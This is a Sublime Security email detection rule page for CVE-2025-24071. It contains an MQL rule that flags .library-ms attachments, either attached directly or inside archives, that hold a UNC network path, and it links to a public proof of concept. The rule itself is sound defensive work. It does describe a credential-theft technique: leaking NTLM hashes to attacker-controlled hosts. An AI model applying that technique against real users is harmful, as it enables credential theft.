Critical Severity

Attachment: CVE-2025-24071 - Microsoft Windows File Explorer Spoofing Vulnerability

Labels

Credential Phishing

Scripting

Description

Detects a Windows library file (.library-ms) containing a network path, either as a direct attachment or within an archive. This file type can be used to cause Windows to send NTLM hash to malicious network locations.

References

https://cti.monster/blog/2025/03/18/CVE-2025-24071.html

https://github.com/0x6rss/CVE-2025-24071_PoC

Sublime Security

Created Mar 21st, 2025 • Last updated Mar 21st, 2025

Feed Source

Sublime Core Feed

Source

GitHub

type.inbound
and any(attachments,
        // handle directly attached files first
        (
          .file_extension == "library-ms"
          // and contains a url with the \\
          and strings.icontains(file.parse_text(.).text, '<url>\\')
        )
        // handle library-ms files inside of archives
        or (
          .file_extension in $file_extensions_common_archives
          and any(file.explode(.),
                  // the exploded archive contained a file with the library-ms extension
                  .file_extension == "library-ms"
                  // and the strings in that file contain the required url variable
                  and any(.scan.strings.strings, strings.contains(., '<url>\\'))
          )
        )
)

MQL Rule Console

•Docs•Learning Labs

Playground

Test against your own EMLs or sample data.

Post about this on your socials.

Get Started. Today.

Managed or self-managed. No MX changes.